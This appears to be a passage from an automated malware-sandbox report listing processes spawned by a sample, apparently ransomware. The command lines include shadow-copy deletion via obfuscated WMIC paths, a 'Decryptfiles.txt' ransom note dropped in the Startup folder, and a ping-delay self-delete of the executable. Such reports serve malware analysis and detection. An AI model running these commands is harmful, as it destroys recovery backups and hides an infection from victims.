                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\t5y6t5.exe"
                                                                                            Imagebase:0x5b0000
                                                                                            File size:917'440 bytes
                                                                                            MD5 hash:616EDCD99B6C4FE02E25D31AE57C087C
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:31
                                                                                            Start time:23:26:46
                                                                                            Start date:04/12/2024
                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:c:\HJKnzu\HJKn\..\..\Windows\HJKn\HJKn\..\..\system32\HJKn\HJKn\..\..\wbem\HJKn\HJKnz\..\..\wmic.exe shadowcopy delete
                                                                                            Imagebase:0x7ff603cb0000
                                                                                            File size:576'000 bytes
                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:32
                                                                                            Start time:23:26:46
                                                                                            Start date:04/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff66e660000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:36
                                                                                            Start time:23:26:55
                                                                                            Start date:04/12/2024
                                                                                            Path:C:\Windows\System32\notepad.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt
                                                                                            Imagebase:0x7ff6a0030000
                                                                                            File size:201'216 bytes
                                                                                            MD5 hash:27F71B12CB585541885A31BE22F61C83
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            Target ID:37
                                                                                            Start time:23:27:04
                                                                                            Start date:04/12/2024
                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:c:\gdzXho\gdzX\..\..\Windows\gdzX\gdzX\..\..\system32\gdzX\gdzX\..\..\wbem\gdzX\gdzXh\..\..\wmic.exe shadowcopy delete
                                                                                            Imagebase:0x7ff603cb0000
                                                                                            File size:576'000 bytes
                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:38
                                                                                            Start time:23:27:04
                                                                                            Start date:04/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\t5y6t5.exe"
                                                                                            Imagebase:0x1c0000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:39
                                                                                            Start time:23:27:04
                                                                                            Start date:04/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff66e660000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:40
                                                                                            Start time:23:27:04
                                                                                            Start date:04/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff66e660000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:41
                                                                                            Start time:23:27:04
                                                                                            Start date:04/12/2024
                                                                                            Path:C:\Windows\SysWOW64\PING.EXE
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:ping 1.1.1.1 -n 1 -w 3000
                                                                                            Imagebase:0xe20000
                                                                                            File size:18'944 bytes
                                                                                            MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:42
                                                                                            Start time:23:27:05
                                                                                            Start date:04/12/2024
                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:c:\WUQpVs\WUQp\..\..\Windows\WUQp\WUQp\..\..\system32\WUQp\WUQp\..\..\wbem\WUQp\WUQpV\..\..\wmic.exe shadowcopy delete
                                                                                            Imagebase:0x7ff603cb0000
                                                                                            File size:576'000 bytes
                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:43
                                                                                            Start time:23:27:05
                                                                                            Start date:04/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\t5y6t5.exe"
                                                                                            Imagebase:0x1c0000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:44
                                                                                            Start time:23:27:05
                                                                                            Start date:04/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff66e660000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:45
                                                                                            Start time:23:27:05
                                                                                            Start date:04/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff66e660000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:46
                                                                                            Start time:23:27:05
                                                                                            Start date:04/12/2024
                                                                                            Path:C:\Windows\SysWOW64\PING.EXE
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:ping 1.1.1.1 -n 1 -w 3000
                                                                                            Imagebase:0xe20000
                                                                                            File size:18'944 bytes
                                                                                            MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:47
                                                                                            Start time:23:27:09
                                                                                            Start date:04/12/2024
                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:c:\WnmQCH\WnmQ\..\..\Windows\WnmQ\WnmQ\..\..\system32\WnmQ\WnmQ\..\..\wbem\WnmQ\WnmQC\..\..\wmic.exe shadowcopy delete
                                                                                            Imagebase:0x7ff603cb0000
                                                                                            File size:576'000 bytes
                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:48
                                                                                            Start time:23:27:09
                                                                                            Start date:04/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\t5y6t5.exe"
                                                                                            Imagebase:0x1c0000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:49
                                                                                            Start time:23:27:09
                                                                                            Start date:04/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff66e660000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:50
                                                                                            Start time:23:27:09
                                                                                            Start date:04/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff66e660000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:51
                                                                                            Start time:23:27:09
                                                                                            Start date:04/12/2024
                                                                                            Path:C:\Windows\SysWOW64\PING.EXE
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:ping 1.1.1.1 -n 1 -w 3000
                                                                                            Imagebase:0x7ff73cb40000
                                                                                            File size:18'944 bytes
                                                                                            MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            No disassembly